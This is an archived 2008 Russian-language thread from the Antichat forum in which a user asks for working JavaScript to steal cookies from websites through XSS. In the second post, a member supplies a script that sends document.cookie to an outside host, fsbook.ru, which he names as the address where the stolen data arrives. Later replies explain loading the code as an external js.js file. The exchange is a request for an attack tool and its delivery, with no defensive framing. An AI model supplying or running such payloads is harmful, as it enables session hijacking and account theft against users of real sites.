ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу вопрос по javascript для xss
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

вопрос по javascript для xss
  #1  
Старый 25.04.2008, 01:15
*.exe
Познающий
Регистрация: 08.01.2007
Сообщений: 67
Провел на форуме:
242263

Репутация: 36
Отправить сообщение для *.exe с помощью ICQ
По умолчанию вопрос по javascript для xss
На форуме не раз видел примеры xss с ссылкой на js.js

в этом js коде пропысывается скрипт который прет куки с сайта или форума.

так вот прозьба парни у кого есть данный код выложите плиз рабочий очень надо

спс.
 
Ответить с цитированием

  #2  
Старый 25.04.2008, 01:27
astrologer
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349

Репутация: 808


По умолчанию
Код:
<script type="text/javascript">
(new Image()).src = 'http://fsbook.ru?' + document.cookie;
</script>
'http://fsbook.ru?' - адрес, куда данные будут приходить
 
Ответить с цитированием

  #3  
Старый 25.04.2008, 03:46
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
мб он имел в виду
<script src="http://.../js.js"></script>
 
Ответить с цитированием

  #4  
Старый 25.04.2008, 09:29
*.exe
Познающий
Регистрация: 08.01.2007
Сообщений: 67
Провел на форуме:
242263

Репутация: 36
Отправить сообщение для *.exe с помощью ICQ
По умолчанию
Цитата:
Сообщение от astrologer  
Код:
<script type="text/javascript">
(new Image()).src = 'http://fsbook.ru?' + document.cookie;
</script>
'http://fsbook.ru?' - адрес, куда данные будут приходить
спс =)
 
Ответить с цитированием

  #5  
Старый 25.04.2008, 09:50
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию
*.exe, если ты про примеры, такие, как показал Ponchik, то код в js.js должен быть без тегов скрипт.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
Raid, Scsi Cthulchu Аппаратное обеспечение 5 22.11.2008 16:45
GnuPG (GPG) - Цифровая подпись, шифрование elimS2 Безопасность 2 16.04.2008 10:00
JavaScript Hijacking [Raz0r] Авторские статьи 1 25.01.2008 20:32
Изготавливаем эффектный водоблок своими руками dinar_007 Аппаратное обеспечение 0 09.01.2006 19:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ